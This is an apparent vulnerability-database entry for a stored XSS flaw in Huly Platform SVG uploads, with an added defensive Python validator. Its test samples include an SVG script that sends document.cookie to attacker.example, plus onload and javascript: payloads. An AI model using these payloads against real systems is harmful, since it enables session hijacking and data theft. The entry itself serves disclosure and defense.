CVE-2024-27706
Description
Cross Site Scripting vulnerability in Huly Platform v.0.6.202 allows attackers to execute arbitrary code via upload of crafted SVG file to issues.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Huly Platform v0.6.202 allows stored XSS via crafted SVG file uploads to issues, enabling arbitrary script execution.
Vulnerability
Overview
CVE-2024-27706 is a stored cross-site scripting (XSS) vulnerability in Huly Platform version 0.6.202. The flaw resides in the issue attachment functionality, where the application fails to sanitize or restrict SVG file uploads. An attacker can upload a malicious SVG file containing embedded JavaScript, which is then stored on the server and served to other users [1].
Exploitation
Method
To exploit this vulnerability, an attacker must be able to create or edit issues within the platform; depending on the instance configuration, this may require some level of authenticated access. The attacker uploads a crafted SVG file containing a `<script>` tag with arbitrary JavaScript as an attachment to an issue. Because the attachment is served from the Huly application's own origin, when another user opens or views the uploaded SVG in their browser the script executes in the context of the Huly application domain [1].
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser. This can lead to session hijacking, theft of sensitive data, defacement of the application interface, or further actions performed on behalf of the victim within the Huly platform. Since the injected script is stored on the server, every user who views the malicious SVG is affected, making this a stored (persistent) XSS [1].
Mitigation
As of the publication date (April 3, 2024), the vendor has not released a patch for this version. Administrators are advised to restrict SVG file uploads or, as a workaround, to implement content-type validation and SVG sanitization. Serving attachments with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy`, or from a separate origin, also prevents an uploaded SVG from executing script in the application's origin even if sanitization is bypassed. The vulnerability was discovered and reported by researcher Bruno Menna in February 2024 [1].
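The following is an added example of the upload-side check and response headers the mitigation describes; it is not Huly's code and not the vendor's fix, and the `validate_svg` and `attachment_response_headers` names, as well as the sample SVG files, are constructed for illustration. It rejects the kind of script-bearing SVG the exploitation section describes with an element allow-list rather than a deny-list, and it shows how to serve even a validated file so that a sanitizer bypass cannot run in the application's origin.

```python
"""Added example (not Huly's code): allow-list validation of SVG attachments
and inert response headers for serving them."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Conservative allow-list of drawing elements. Anything not listed here
# (script, foreignObject, use, animate, style, a, ...) is rejected, so new or
# unusual executable element types are denied by default.
ALLOWED_TAGS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "linearGradient",
    "radialGradient", "stop", "clipPath", "mask",
}
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}


def _split(qname):
    """Split an ElementTree '{ns}local' name into (ns, local)."""
    if qname.startswith("{"):
        ns, local = qname[1:].split("}", 1)
        return ns, local
    return "", qname


def validate_svg(data):
    """Return a list of rejection reasons; an empty list means accept.

    Checks: no DOCTYPE/ENTITY declarations (blocks XXE and entity expansion),
    well-formed XML with an svg:svg root, every element in ALLOWED_TAGS and in
    the SVG namespace, no on* event-handler attributes, and no href that is
    anything other than an in-document fragment reference (#id).
    """
    lowered = data.lower()
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE/ENTITY declarations are not allowed"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    reasons = []
    if root.tag != f"{{{SVG_NS}}}svg":
        reasons.append(f"root element is {root.tag!r}, expected svg:svg")
    for el in root.iter():
        ns, local = _split(el.tag)
        if ns != SVG_NS or local not in ALLOWED_TAGS:
            reasons.append(f"element <{local}> is not allowed")
        for attr, value in el.attrib.items():
            _, attr_local = _split(attr)
            if attr_local.lower().startswith("on"):
                reasons.append(f"event handler attribute {attr_local!r} on <{local}>")
            if attr in HREF_ATTRS or attr_local == "href":
                # Only same-document references are allowed; this blocks
                # javascript:, data: and external URLs.
                if not re.fullmatch(r"\s*#[\w.:-]+\s*", value):
                    reasons.append(f"disallowed href {value!r} on <{local}>")
    return reasons


def attachment_response_headers(filename, validated):
    """Headers for serving a stored attachment.

    Even a validated SVG is served as a download with a script-free CSP, so a
    sanitizer bypass still cannot execute in the application's origin.
    """
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml" if validated else "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; script-src 'none'; sandbox",
    }


# Constructed sample files (not taken from the CVE report).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <defs><linearGradient id="g"><stop offset="0"/></linearGradient></defs>
  <rect width="10" height="10" fill="url(#g)"/>
</svg>"""
SCRIPT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
</svg>"""
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
  <circle r="5"/>
</svg>"""
HREF_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:alert(1)"><text>click</text></a>
</svg>"""

if __name__ == "__main__":
    samples = [("benign", BENIGN_SVG), ("script", SCRIPT_SVG),
               ("onload", HANDLER_SVG), ("href", HREF_SVG)]
    for name, blob in samples:
        reasons = validate_svg(blob)
        print(f"{name:7s} {'ACCEPT' if not reasons else 'REJECT'} {reasons}")
    print(attachment_response_headers("diagram.svg", validated=True))
```

The allow-list deliberately excludes `style`, `use`, `a` and the animation elements, since each has been used to smuggle script or external loads past deny-list filters; for production use, parse with `defusedxml` rather than the stdlib parser and apply the download headers regardless of the validation result.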
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (1)
News mentions (0)
No linked articles in our index yet.